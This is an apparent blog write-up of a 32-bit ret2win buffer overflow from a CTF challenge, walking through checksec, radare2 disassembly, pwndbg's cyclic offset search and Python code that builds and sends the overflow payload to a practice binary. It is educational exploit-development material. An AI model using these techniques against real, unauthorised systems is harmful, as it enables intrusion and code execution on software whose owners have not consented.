Pwntools 101 - Pwndbg & Buffer Overflows
About The Project
Pwndbg and Pwntools are Python-based tools for automating different parts of exploit development: pwntools is an exploit-scripting framework, and pwndbg is a GDB plugin. Both are highly popular amongst CTF players as they simplify and accelerate the creation of Proof of Concept (PoC) scripts for memory corruption exploits. I’m not yet proficient with pwntools or pwndbg, but this marks the beginning of a series of blogs aimed at improving my skills with pwntools for memory corruption CTF challenges.
Simple Stack Smash - Virginia Tech Summit CTF 2023
Virginia Tech’s Summit CTF was this past April, and I joined promptly about an hour or two before it ended. Among the Reverse Engineering challenges was an introductory 32-bit ELF binary challenge called ‘simple-stack-smash’, the perfect buffer-overflow (BoF) candidate for exploring Pwntools.
1) Let’s leverage checksec to identify protections on the binary.
The image below shows there’s no stack canary, but there is a non-executable stack (NX). What does this mean?
- No Stack Canary: there’s no additional check on the stack for buffer overflows.
- Non-executable stack: We cannot execute code placed on the stack (start thinking ROP)
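To make the NX result less of a black box, here is a minimal sketch of how such a check can work for a 32-bit little-endian ELF: walk the program headers, find the PT_GNU_STACK entry, and see whether its flags include the execute bit. This is not the checksec implementation; the function name nx_enabled is made up for illustration, and only standard ELF32 header offsets are used.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type describing stack permissions
PF_X = 0x1                 # "executable" bit in p_flags


def nx_enabled(elf: bytes) -> bool:
    """Return True if a 32-bit little-endian ELF marks its stack non-executable.

    Hypothetical helper for illustration only, not part of pwntools or checksec.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF")

    # ELF32 header: e_phoff at offset 28, e_phentsize at 42, e_phnum at 44.
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)

    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", elf, base)
        if p_type == PT_GNU_STACK:
            # ELF32 program header: p_flags lives at offset 24.
            (p_flags,) = struct.unpack_from("<I", elf, base + 24)
            return not (p_flags & PF_X)

    # No PT_GNU_STACK entry: treat the stack as potentially executable.
    return False
```

Reading the challenge file with open(path, "rb").read() and passing the bytes to nx_enabled should agree with what checksec reports for NX, assuming the binary is a regular 32-bit x86 ELF.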
Now let’s explore the binary a little bit, starting at main.
If you’re new to Reverse Engineering and want to learn how to identify main, check out this YouTube video made by Arch Cloud Labs a year ago covering this very subject. The main function within Ghidra shows the program taking user input via fgets of up to 0x400 bytes and storing it in a buffer of only 16 bytes. If an end user enters more than 16 bytes, the fixed-length array will overflow.
This is a classic buffer overflow. Often, telltale signs of these vulnerabilities in CTFs are the use of gets, which performs no bounds checking, or the careless use of a copy function such as strcpy or memcpy. However, here we see an example of how fgets, and by extension other copy functions where the caller specifies the number of bytes to copy, can be used incorrectly: the size passed in (0x400) is far larger than the 16-byte destination buffer.
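The effect of that size mismatch can be modelled in a few lines of Python. This is only a toy model of a stack frame, not the real binary: the 16-byte buffer and the 0x400 limit come from the decompilation, while the 8 bytes of saved registers between the buffer and the return address, the placeholder byte values, and the function name are assumptions made for illustration. Real fgets also stops at a newline and appends a NUL byte, which is ignored here.

```python
BUF_SIZE = 16        # destination buffer size seen in Ghidra
READ_LIMIT = 0x400   # size argument passed to fgets
SAVED_REGS = 8       # ASSUMPTION: saved registers between buffer and return address
ORIGINAL_RET = b"\x11\x22\x33\x44"  # placeholder for the saved return address


def fgets_into_frame(user_input: bytes) -> bytearray:
    """Copy input into a modelled frame the way an unchecked C copy would."""
    frame = bytearray(BUF_SIZE) + bytearray(b"\xee" * SAVED_REGS) + bytearray(ORIGINAL_RET)

    # fgets reads at most size - 1 bytes, which is still far more than 16.
    data = user_input[: READ_LIMIT - 1]

    # C does not stop at the end of the buffer; the copy runs into whatever
    # follows it. The model is clamped to the frame so Python stays in bounds.
    n = min(len(data), len(frame))
    frame[:n] = data[:n]
    return frame


short = fgets_into_frame(b"A" * 10)
long_ = fgets_into_frame(b"A" * 64)
print(bytes(short[-4:]))  # return address untouched
print(bytes(long_[-4:]))  # return address replaced by input bytes
```

Any input that fits in the buffer leaves the last four bytes of the model alone, while a longer input replaces them with attacker-supplied data.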
2) Identify the CTF Goal
It’s immediately visible to the competitor that the buffer can be overflowed to crash the program.
However, crashes are not the desired end goal. Ultimately, the goal is to overwrite the saved return address on the stack so that a value of our choosing is loaded into the EIP register, influencing the control flow of the binary.
But what does one do once control flow is gained since the NX bit prevents executing arbitrary code on the stack? Enter the “win function”.
With non-executable stacks in entry-level CTF BoFs, a competitor usually ends up in a “ret2win” scenario. A ret2win challenge’s goal is to redirect execution to a “win method”.
This “win method” usually returns a shell or gives the user a flag. Sure enough, our non-stripped binary has said win method at address 0x8049216.
In order to complete this challenge, EIP will have to contain the address of the win method.
Let’s analyze this further.
The disassembly below shows the address of a string loaded into eax (0x08049229), pushed onto the stack (0x0804922f), and then passed to the libc system function, which runs it as a shell command.
Cross-referencing the strings output (using axt in radare2), the following command is executed: cat /src/flag.txt. Obviously /src/flag.txt does not exist on the local machine; it lives on the target machine the competition expects the competitor to connect to.
[0x08049216]> s sym.win
[0x08049216]> pdf
┌ 41: sym.win ();
│ 0x08049216 f30f1efb endbr32
│ 0x0804921a 55 push ebp
│ 0x0804921b 89e5 mov ebp, esp
│ 0x0804921d 53 push ebx
│ 0x0804921e e82dffffff call sym.__x86.get_pc_thunk.bx
│ 0x08049223 81c3dd2d0000 add ebx, 0x2ddd
│ 0x08049229 8d8308e0ffff lea eax, [ebx - 0x1ff8]
│ 0x0804922f 50 push eax ; const char *string
│ 0x08049230 e88bfeffff call sym.imp.system ; int system(const char *string)
│ 0x08049235 83c404 add esp, 4
│ 0x08049238 6a00 push 0 ; int status
└ 0x0804923a e891feffff call sym.imp.exit ; void exit(int status)
............................................................................................................
[0x08049216]> iz
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00002008 0x0804a008 17 18 .rodata ascii cat /src/flag.txt
1 0x0000201a 0x0804a01a 24 25 .rodata ascii Please enter your name:
2 0x00002033 0x0804a033 11 12 .rodata ascii Hello, %s!\n
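The link between the lea instruction and the string table can also be checked by hand. The sketch below redoes the arithmetic from the listing, relying on the fact that __x86.get_pc_thunk.bx leaves the address of the instruction following the call (0x08049223) in ebx; the variable names are just labels for this example.

```python
# Address of the instruction right after "call sym.__x86.get_pc_thunk.bx";
# the thunk copies this return address into ebx.
after_call = 0x08049223

# add ebx, 0x2ddd
ebx = (after_call + 0x2DDD) & 0xFFFFFFFF

# lea eax, [ebx - 0x1ff8]
string_addr = (ebx - 0x1FF8) & 0xFFFFFFFF

print(hex(ebx))          # 0x804c000
print(hex(string_addr))  # 0x804a008
```

The result, 0x0804a008, is the vaddr that iz lists for "cat /src/flag.txt", which confirms the argument handed to system.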
With a target function identified, and the vulnerability clear as day, now one must generate a payload to overwrite EIP and then influence code execution to the win method.
3) Payload Offset Generation
Calculating the offset and generating the payload for buffer overflows that overwrite EIP is often tedious.
This is where pwndbg comes into the picture. Pwndbg is a GDB plugin with handy helper functions for Reverse Engineering tasks.
A particular function of interest to us is cyclic. The cyclic function generates a pattern in which every 4-byte chunk is unique; feeding it to the program as input triggers a crash. After the crash, the bytes that landed in EIP identify how many bytes of padding are needed before the attacker controls what’s in the EIP register. The image below shows EIP with “gaaa”. The cyclic command can then be used to look up the offset needed to control EIP, which is 24 bytes.
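To see why “gaaa” maps to 24, it helps to rebuild the pattern without any tooling. The sketch below generates a de Bruijn sequence over the lowercase alphabet with subsequence length 4, which, as far as I can tell, matches the default pattern that pwntools and pwndbg produce; the function name de_bruijn and this particular implementation are my own and are not taken from either project.

```python
import string


def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Build a de Bruijn sequence: every length-n chunk appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t: int, p: int) -> None:
        if t > n:
            # Emit the current Lyndon word if its length divides n.
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


pattern = de_bruijn(string.ascii_lowercase.encode(), 4)

print(pattern[:32])           # start of the pattern
print(pattern.find(b"gaaa"))  # offset of the bytes seen in EIP
```

Because each 4-byte window occurs only once, searching for the bytes found in EIP gives a single answer, here 24, which is the amount of padding needed before the return address.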
Now, pwntools can be used to generate a simple template via $> pwn template.
This template is pretty awesome. It can easily be used for remote and local exploits. The image below shows copying data from pwndbg to pwntools for building our proof-of-concept exploit. Line 38 shows p32(0x08049216). This function packs the 32-bit integer into four little-endian bytes at runtime, making it easier to read and construct our payload while writing the “pwn” script.
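For readers without pwntools at hand, the packing step can be reproduced with the standard library. This is a sketch of what the little-endian packing amounts to, using struct instead of pwntools; the helper name p32_le is invented for this example.

```python
import struct


def p32_le(value: int) -> bytes:
    """Pack an unsigned 32-bit integer as four little-endian bytes."""
    return struct.pack("<I", value)


win_addr = 0x08049216        # address of win from the radare2 output
packed = p32_le(win_addr)

# 24 bytes of padding (the offset found with cyclic), then the new return address.
payload = b"A" * 24 + packed

print(packed.hex())  # 16920408
print(len(payload))  # 28
```

The least significant byte (0x16) comes first, which is the order x86 expects when it pops the return address off the stack.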
4) Putting it All Together
With the output from pwndbg and pwntools in hand, the target file /src/flag.txt can be created locally to show the successful overwrite and code execution.
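Since the screenshots carry the actual script, here is a rough sketch of what the core of such an exploit could look like. It is not the script from the image: the function names are mine, the payload is built with struct rather than p32, and exploit accepts any object that behaves like a pwntools tube (something offering sendlineafter and recvall, as process and remote objects do). Waiting for "name:" is based on the prompt string from the iz output.

```python
import struct

WIN_ADDR = 0x08049216  # address of win, from radare2
OFFSET = 24            # bytes of padding before the return address, from cyclic


def build_payload() -> bytes:
    """Padding up to the saved return address, then the address of win."""
    return b"A" * OFFSET + struct.pack("<I", WIN_ADDR)


def exploit(io) -> bytes:
    """Send the payload over a pwntools-style tube and return all output.

    `io` is assumed to provide sendlineafter() and recvall().
    """
    # Wait for the "Please enter your name:" prompt, then send the overflow.
    io.sendlineafter(b"name:", build_payload())
    # win calls system() and then exit(), so the stream closes on its own.
    return io.recvall()
```

With pwntools installed, this would be driven by something like exploit(process("./simple-stack-smash")) for a local run or exploit(remote(host, port)) against the competition server; the binary path, host, and port here are placeholders, not values from the challenge.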
Beyond The Blog
This was a straightforward buffer overflow walkthrough with pwntools and pwndbg. It’s handy to keep these templates around for future competitions and for building more complicated scripts. Hopefully you found it helpful! More tutorials can be found in the official pwntools documentation here.
References
Note: this article was grammatically edited by ChatGPT.